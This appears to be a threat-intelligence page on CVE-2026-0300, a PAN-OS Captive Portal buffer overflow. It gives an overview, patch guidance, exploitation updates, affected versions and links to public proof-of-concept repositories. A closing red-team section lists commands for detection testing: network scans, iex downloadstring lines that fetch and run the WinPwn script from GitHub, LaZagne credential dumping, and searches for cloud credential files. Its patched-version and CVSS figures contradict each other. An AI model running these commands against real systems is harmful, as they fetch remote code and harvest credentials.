CVE-2026-0300
Overview
This vulnerability is a buffer overflow caused by improper bounds checking in the User-ID™ Authentication Portal (Captive Portal) service of Palo Alto Networks PAN-OS software. The flaw arises when the service processes specially crafted network packets, leading to memory corruption. The affected component is the User-ID™ Authentication Portal running on PA-Series and VM-Series firewalls within PAN-OS versions 10.2.0 through 10.2.4.
Vulnerability Description
A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. The risk of this issue is greatly reduced if you secure access to the User-ID™ Authentication Portal per the best practice guidelines https://knowledgebase.paloaltonetworks.com/KCSArticleDetail by restricting access to only trusted internal IP addresses. Prisma Access, Cloud NGFW and Panorama appliances are not impacted by this vulnerability.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to execute arbitrary code with root privileges on vulnerable firewalls. This grants full control over the affected device, including the ability to manipulate firewall policies, intercept or redirect traffic, and disrupt network security. No user interaction or valid credentials are required, making exploitation straightforward in exposed environments. Successful compromise can lead to complete network perimeter breach and lateral movement within protected networks.
Solution
Palo Alto Networks has released patches addressing this vulnerability in PAN-OS versions 10.2.5 and later. Administrators should upgrade affected PA-Series and VM-Series firewalls to the latest PAN-OS release as detailed in the vendor advisory at https://security.paloaltonetworks.com/CVE-2026-0300. Additionally, restricting access to the User-ID™ Authentication Portal to trusted internal IP addresses per Palo Alto Networks best practice guidelines is recommended as a temporary mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical buffer overflow vulnerability exists within the User-ID™ Authentication Portal service of Palo Alto Networks' PAN-OS software. This flaw allows an unauthenticated attacker to send specially crafted packets that can lead to arbitrary code execution with root privileges on the affected PA-Series and VM-Series firewalls. The underlying issue arises from improper handling of input data, which can cause the memory to be overwritten, potentially leading to the execution of malicious code. The severity of this vulnerability is underscored by its high CVSS score of 9.3, indicating a significant risk to systems that do not implement adequate security measures.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage the User-ID™ Authentication Portal, which is typically exposed to the network, to send crafted packets that exploit the buffer overflow. Since the vulnerability does not require authentication, it poses a substantial threat, especially in environments where the portal is accessible from untrusted networks. Attack scenarios could range from unauthorized access to sensitive data, disruption of services, or even complete takeover of the firewall, which could lead to further exploitation of the internal network.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Palo Alto Networks firewalls for their security posture. A successful exploit could result in unauthorized access to critical infrastructure, leading to data breaches, service outages, and significant financial losses. The potential for attackers to execute arbitrary code with root privileges means that they could manipulate firewall settings, disable security features, or pivot to other systems within the network. This not only compromises the integrity of the firewall but also exposes the organization to regulatory penalties and reputational damage.
To detect and mitigate this vulnerability, organizations should prioritize implementing best practice guidelines for securing access to the User-ID™ Authentication Portal. This includes restricting access to only trusted internal IP addresses, thereby minimizing the attack surface. Regularly updating the PAN-OS software to the latest versions is crucial, as vendors typically release patches to address known vulnerabilities. Additionally, employing intrusion detection systems (IDS) and intrusion prevention systems (IPS) can help identify and block malicious traffic attempting to exploit this vulnerability. Continuous monitoring and logging of firewall activities can also aid in the early detection of suspicious behavior, allowing for timely incident response.
In conclusion, the buffer overflow vulnerability in the User-ID™ Authentication Portal of Palo Alto Networks PAN-OS represents a significant threat to organizations utilizing these firewalls. Given the potential for severe consequences, it is imperative for organizations to adopt a proactive security posture. By implementing stringent access controls, maintaining up-to-date software, and leveraging security monitoring tools, organizations can effectively mitigate the risks associated with this vulnerability and protect their critical assets from exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-0300, evidenced by a significant rise in telemetry signals and the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This development is compounded by the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated priority for remediation within critical infrastructure environments. The EPSS score increase to 0.1443, placing it near the 94th percentile, further validates the growing likelihood of exploitation attempts in the wild. The availability of diverse exploitation tools lowers the barrier for threat actors, potentially expanding the attacker base beyond advanced persistent threat groups to include opportunistic actors. Collectively, these factors elevate the threat level from high to critical, signaling an urgent need for heightened vigilance and accelerated defensive measures by organizations deploying affected Palo Alto Networks PAN-OS firewalls.
Update 2 — May 22, 2026
CSURFACE threat intelligence has identified a recalibration of the CVSS score for CVE-2026-0300 from 0.0 to 9.8, reflecting a critical reassessment of the vulnerability’s severity. This adjustment coincides with a slight uptick in detection activity and the emergence of multiple new proof-of-concept exploits publicly available on GitHub, broadening the exploit landscape and lowering the technical barriers for adversaries. Interestingly, despite these developments, the EPSS score has decreased significantly, suggesting a current reduction in the overall probability of widespread exploitation, although recent trends indicate a modest increase in exploit attempts. This nuanced dynamic underscores a complex threat environment where the vulnerability’s potential impact remains severe, but exploitation frequency is fluctuating. For defenders, this means that while the risk of successful attacks remains critically high due to the vulnerability’s root-level code execution capability, the immediate likelihood of exploitation is somewhat moderated but not negligible. Consequently, the threat level should be maintained at critical, emphasizing the need for continued vigilance as the availability of diverse exploitation tools could rapidly accelerate attack activity.
Affected Products (163)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.1 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.5 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.5:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.6 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.6:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h12:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h16:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h19:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h21:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h24:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h3:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h32:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h6:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.7 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h8:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
p3Nt3st3r-sTAr/CVE-2026-0300-POC
|
p3Nt3st3r-sTAr | 20 | 12 | 2026-05-06 | View |
|
qassam-315/PAN-OS-User-ID-Buffer-Overflow-PoC
A research-grade Proof-of-Concept (PoC) for CVE-2026-0300, targeting the Buffer Overflow vulnerability in Palo Alto Netw...
|
qassam-315 | 3 | 0 | 2026-05-06 | View |
|
bannned-bit/CVE-2026-0300-PANOS
Security Research and Proof-of-Concept (PoC) for CVE-2026-0300 : Unauthenticated Remote Code Execution (RCE) in Palo Alt...
|
bannned-bit | 1 | 0 | 2026-05-06 | View |
|
0xBlackash/CVE-2026-0300
CVE-2026-0300
|
0xBlackash | 0 | 1 | 2026-05-06 | View |
|
mr-r3b00t/CVE-2026-0300
a honeypot for CVE-2026-0300
|
mr-r3b00t | 1 | 0 | 2026-05-06 | View |
|
ridhinva/CVE-2026-0300-PANOS-RCE
PAN-OS User-ID Captive Portal Buffer Overflow RCE Scanner & Checker
|
ridhinva | 0 | 0 | 2026-05-22 | View |
|
lu4m575/CVE-2026-0300
CVE-2026-0300 PAN-OS 12.1, 11.2, 11.1, 10.2
|
lu4m575 | 0 | 0 | 2026-05-21 | View |
|
TailwindRG/cve-2026-0300-audit
Read-only audit tooling for CVE-2026-0300 (PAN-OS User-ID Authentication Portal exposure)
|
TailwindRG | 0 | 0 | 2026-05-06 | View |
|
shizuku198411/CVE-2026-0300
PAN-OS CVE-2026-0300 Non-Destructive Exposure Survey Tool
|
shizuku198411 | 0 | 0 | 2026-05-06 | View |
Threat Feed
27 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-0300 |
| security.paloaltonetworks.com |
GitHub CVE
vendor-advisory
|
https://security.paloaltonetworks.com/CVE-2026-0300 |
| cert-portal.siemens.com |
NVD API
Third Party Advisory
|
https://cert-portal.siemens.com/productcert/html/ssa-967325.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-0300 |